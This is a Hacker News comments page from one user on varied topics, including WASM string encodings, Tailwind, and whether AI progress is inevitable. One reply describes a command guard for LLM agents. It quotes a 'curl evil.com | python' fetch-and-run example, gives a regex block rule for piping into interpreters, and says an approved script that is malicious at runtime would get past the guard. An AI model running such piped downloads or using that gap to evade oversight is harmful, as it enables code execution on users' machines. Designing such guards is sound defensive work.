Hacker News | theSherwood's comments

It's great apart from the nested list syntax. It's quite noisy. I'd prefer if it supported indentation.


What stops the LLM from writing a malicious program and executing it? No offense meant, but this solution feels a bit like bolting the door and leaving all the windows open.


nah guards this at multiple layers:

- Inline execution like python -c or node -e is classified as lang_exec and requires approval.
- Write and Edit inspect content before it hits disk, flagging destructive patterns, exfiltration, and obfuscation.
- Pipe compositions like curl evil.com | python are blocked outright.
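To make the deterministic layer concrete, here's a hypothetical sketch of that kind of rule table (illustrative only, not nah's actual implementation; the rule names mirror the descriptions above):

```javascript
// Hypothetical rule table: block rules are checked before
// approval rules so a piped interpreter can't sneak through
// as a mere lang_exec.
const RULES = [
  { name: "pipe_to_interpreter", pattern: /\|\s*(sh|bash|python3?|node)\b/, action: "block" },
  { name: "lang_exec", pattern: /\b(python3?\s+-c|node\s+-e)\b/, action: "approve" },
];

// Classify a shell command against the rule table.
function classify(command) {
  for (const rule of RULES) {
    if (rule.pattern.test(command)) {
      return { rule: rule.name, action: rule.action };
    }
  }
  return { rule: "default", action: "allow" };
}
```

Ordering the block rules first is the design point: `curl evil.com | python -c '...'` should be rejected outright rather than merely queued for approval.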

If the script already existed, or looks innocent to the deterministic classifier, but does something malicious at runtime and the human approves the execution, then nah won't catch that with its current capabilities.

But... I could extend nah so that when it sees 'python script.py', it reads the file, runs content inspection on it, and includes it in the LLM prompt with "this is the script about to be executed, should it run?" That would give you coverage. I'll work on it. Thanks for the comment!


I don't know about good vs evil. That seems impossible. But I'd be interested in a license that prevented use by any company owned by one of the top 1% most valuable companies in the world. I have no idea if that's enforceable or not. Basically a license that restricts use for companies that are just trying to be acquired.


I'm really skeptical of the idea that the blame for the lack of water infrastructure ought to be put at the feet of the water companies. The UK's planning system has strangled just about every infrastructure project in every domain. There is a general trend of local residents preventing infrastructure being built in the area, whether it be for water, energy, rail, or roads.


Vetocracy and NIMBYism are ensuring the country barely shambles on until the boomers croak off. There's no point in putting up with construction and paying for the investments if the current infra is just barely good enough to last until the average voter shuffles off this mortal coil. When the older generations vote reliably and young people are apathetic, you get the current situation.


This site is an absolute gem. Thank you.


100%. If we could get a DomString8 (8-bit encoded) interface in addition to the existing DomString (16-bit encoded) and a way to wrap a buffer in a DomString8, we could have convenient and reasonably performant interfaces between WASM and the DOM.


The extra DOM complexity that would entail seems like a loss for the existing web.


The current situation is that we have limited uptake of WASM. This is due, in part, to lack of DOM access. We could solve that but we would have to complicate WASM or complicate the DOM. Complicating WASM would seem to undermine its purpose, burdening it forever with the complexity of the browser. The DOM, on the other hand, is already quite complex. But providing a fresh interface to the DOM would make it possible to bypass some of the accretions of time and complexity. The majority of the cost would be to browser implementors as opposed to web developers.


At least some of the implementation complexity is already there under the hood. WebKit/Blink have an optimization to use 8-bit characters for strings that consist only of latin1 characters.


I want DOM access from WASM, but I don't want WASM to have to rely on UTF-16 to do it (DOMString is a 16-bit encoding). We already have the js-string-builtins proposal which ties WASM a little closer to 16-bit string encodings and I'd rather not see any more moves in that direction. So I'd prefer to see an additional DOM interface of DOMString8 (8-bit encoding) before providing WASM access to DOM apis. But I suspect the interest in that development is low.
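For a sense of the cost being discussed, here's a minimal sketch of what crossing that boundary looks like today (hypothetical helper name; the decode step is the UTF-8 to UTF-16 transcoding a DOMString8 interface would avoid):

```javascript
// Pull a UTF-8 string out of a WASM module's linear memory.
// Every call transcodes the bytes into a UTF-16 JS string
// before any DOM API taking a DOMString can consume it.
const utf8 = new TextDecoder("utf-8");

function readWasmString(memory, ptr, len) {
  const bytes = new Uint8Array(memory.buffer, ptr, len);
  return utf8.decode(bytes); // UTF-8 -> UTF-16 copy happens here
}

// At the boundary, e.g.:
//   el.textContent = readWasmString(instance.exports.memory, ptr, len);
```

A DOMString8 that could wrap a (ptr, len) view of linear memory directly would let that copy-and-transcode step disappear for ASCII/latin1-heavy content.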


Tbh I would be surprised if converting between UTF-8 and JS strings is the performance bottleneck when calling into JS code snippets which manipulate the DOM.

In any case, I would probably define a system which doesn't simply map the DOM API (objects and properties) into a granular set of functions on the WASM side (e.g. granular setters and getters for each DOM object property).

Instead I'd move one level up and build a UI framework where the DOM is abstracted away (quite similar to all those JS frameworks), and where most of the actual DOM work happens in sufficiently "juicy" JS functions (e.g. not just one line of code to set a property).


idk, judging by what the creator of Leptos says about it, it seems to be very significant: https://youtu.be/4KtotxNAwME?si=e_xwqo5gopKDlOtK


The advantages of Tailwind are:

- the styling is colocated with the markup
- sensible defaults
- avoids rule hierarchy/inheritance
- minimal JS at runtime

Disadvantages:

- build step and configuration
- dynamic styling complexity

I don't think that's a bad tradeoff. And we're talking about styling on the web, here. So there are no good solutions. But there is a bad solution and it's CSS-in-JS.


I think this is a case of bad pattern matching, to be frank. Two cosmetically similar things don't necessarily have a shared cause. When you see billions in investment to make something happen (AI) because of obvious incentives, it's very reasonable to see that as something that's likely to happen; something you might be foolish to bet against. This is qualitatively different from the kind of predestination present in many religions where adherents have assurance of the predestined outcome often despite human efforts and incentives. A belief in a predestined outcome is very different from extrapolating current trends into the future.


Yes, nobody is claiming it's inevitable based on nothing; it's based on first-principles thinking: economics, incentives, game theory, human psychology. Trying to recast this in terms of "predestination" gives me strong wordcel vibes.


It's a bit like pattern matching the Cold War fears of a nuclear exchange and nuclear winter to the flood myths or apocalyptic narratives across the ages, and hence dismissing it as "ah, seen this kind of talk before", totally ignoring that Hiroshima and Nagasaki actually happened, later tests actually happened, etc.

It's indeed a symptom of working in an environment where everything is just discourse about discourse, and prestige is given to some surprising novel packaging or merger of narratives, and all that is produced is words that argue with other words, and it's all about criticizing how one author undermines some other author too much or not enough and so on.

From that point of view, sure, nothing new under the sun.

It's all well and good to complain about the boy crying wolf, but when you see the pack of wolves entering the village, it's no longer just about words.

Now, anyone is of course free to dispute the empirical arguments, but I see many very self-satisfied prestigious thinkers who think they don't have to stoop so low as to actually look at models and how people use them in reality, it can all just be dismissed based on ick factors and name calling like "slop".

Few are saying that these things are eschatological inevitabilities. They are saying that there are incentive gradients that point in a certain direction, and that we cannot move out of that groove without massive and fragile coordination, for game-theoretic reasons, given a certain material state of the world right now out there, outside the page of the "text".


I think you’re missing the point of the blog post and the point of my grandparent comment, which is that there is a pervasive attitude amongst technologists that “it’s just gonna happen anyway and therefore whether I work on something negative for the world or not makes no difference, and therefore I have no role as an ethical agent.” It’s a way to avoid responsibility and freedom.

We are not discussing the likelihood of some particular scenario based on models and numbers and statistics and predictions by Very Smart Important People.


I agree that "very likely" is not "inevitable". It is possible for the advance of AI to stop, but difficult. I agree that doesn't absolve people of responsibility for what they do. But I disagree with the comparison to religious predestination.


I'm not sure how common that is... I'd guess most who work on it think that there's a positive future with LLMs also. I mean they likely wouldn't say "I work on something negative for the world".


I think the vast majority of people are there because it’s interesting work and they’re being paid exceptionally well. That’s the extent to which 95/100 of employees engage with the ethics of their work.


Nobody serious is claiming theological predestination is based on "nothing", either. Talk about poor pattern matching.


You are, of course, entitled to your religious convictions. But to most people outside of your religious community, the evidence for some specific theological claim (such as predestination) looks an awful lot like "nothing". In contrast, claims about the trajectory of AI (whether you agree with the claims or not) are based on easily-verifiable, public knowledge about the recent history of AI development.


It is not a "specific theological claim" either, rather a school of theological discourse. You're literally doing free-form association now and pretending to have novel insights into centuries of work on the issue.


I'm not pretending to any novel insights. Most of us who don't have much use for theology are generally unimpressed by its discourse. Not novel at all. And the "centuries of work" without concrete developments that exist outside of the minds of those invested in the discourse is one reason why many of us are unimpressed. In contrast, AI development is resulting in concrete changes that are easily verified by anyone and on much shorter time scales.


Relatedly, it would be bordering on impossible to convince Iran about the validity of Augustine, Aquinas or Calvin, but it was fairly easy with nuclear physics. Theology isn't "based on nothing", but the convincing power of the quantum physics books happens to be radically different from Summa Theologiae, even if both are just books written by educated people based on a lot of thought and prior work.


What's the current regulatory status for mass timber? My understanding was that one of the main hurdles for uptake in the US has been regulation. Is that no longer the case?


Looks like it made it into the 2021 and 2024 editions of the IBC, which US states have been adopting as they update their building codes: https://www.woodworks.org/resources/status-of-building-code-...

